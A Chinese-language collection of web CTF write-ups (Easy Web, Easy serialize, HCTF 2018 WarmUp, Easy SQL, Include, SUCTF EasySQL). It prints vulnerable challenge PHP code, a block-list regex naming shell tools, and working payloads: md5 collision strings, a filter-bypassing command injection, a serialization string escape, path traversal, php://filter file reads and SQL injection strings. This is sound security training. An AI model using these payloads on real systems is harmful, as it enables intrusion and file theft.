Easy Web
看师傅博客发现img后面的内容是加密后的
先base64 base64 base16解密后发现jpg文件 右键源代码发现是data://协议读取
将index.php加密后 发送
index.php
<<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|'|"|`|;|,|*|?|\|\\|n|t|r|xA0|{|}|(|)|&[^d]|@|||\$|[|]|{|}|(|)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>
考查为枚举md5 强类型
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
网上搜集payload
$a='%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2';
$b='%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2';
$a=urldecode($a);
$b=urldecode($b);
var_dump(md5($a));
var_dump(md5($b));
//008ee33a9d58b51cfeb425b0959121c9
//008ee33a9d58b51cfeb425b0959121c9
看一下这个正则
(preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|'|"|`|;|,|*|?|\|\\|n|t|r|xA0|{|}|(|)|&[^d]|@|||\$|[|]|{|}|(|)|-|<|>/i", $cmd))
|\|\\| //这个地方
//过滤的是|\ 并没有过滤\
所以构造payload
cmd=ca\t%20/flag
Easy serialize
<?php
$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
通过查看phpinfo() 发现d0g3_f1ag.php
file_get_contents()函数 正好可以读出来
base64_decode($userinfo['img'])=='d0g3_f1ag.php'
控制$userinfo['img']的值
序列化后 经过filter()函数 再进行反序列化赋值给$userinfo
这里控制$_SESSION['img']的值 但是由于sha1()加密 故不可能base64加密后等于d0g3_f1ag.php
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
这里考查字符串逃逸
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
正常序列后的内容
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:6:"huahua";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
现在我们要控制img里的内容为d0g3_f1ag.php 故序列化后的内容
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:6:"huahua";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
将这一串插进去
1";s:8:"function";s:6:"huahua";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
序列化后的内容
a:3:{s:4:"user";s:5:"guest";s:8:"function";s:70:"1";s:8:"function";s:6:"huahua";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
吞掉
";s:8:"function";s:70:"1
构造payload:
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=1";s:8:"function";s:6:"huahua";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
发现 /d0g3_fllllllag base64编码后继续传入
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=1";s:8:"function";s:6:"huahua";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
[HCTF 2018]
WarmUp
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
简单代码审计
满足三个条件
-
file不为空
-
file为字符
-
file经过emmm类中的checkFile函数返回值为空
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
三个if条件用第二个
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
截取?前面的部分赋值给$_page 由hint.php得知flag在ffffllllaaaagggg里面 直接包含ffffllllaaaagggg
构造payload
file=source.php?../../../../../../ffffllllaaaagggg
[极客大挑战 2019]
Easy SQL
万能密码 'or''='
Have fun
右键源代码 ?cat=dog
[ACTF2020 新生赛]Include
文件包含 直接读文件
php://filter/read=convert.base64-encode/resource=flag.php
[SUCTF 2019]EasySQL
select 1
set sql_mode=pipes_as_concat
select 1||flag from Flag
pipes_as_concat 将||视为一个连接符 相当于concat
select *,1||flag From Flag;
#运算顺序: 为1||flag先进行异或运算 为1 SQL语句为 select *,1 from Flag
#字符和字符或运算为0 字符和数字或运算为1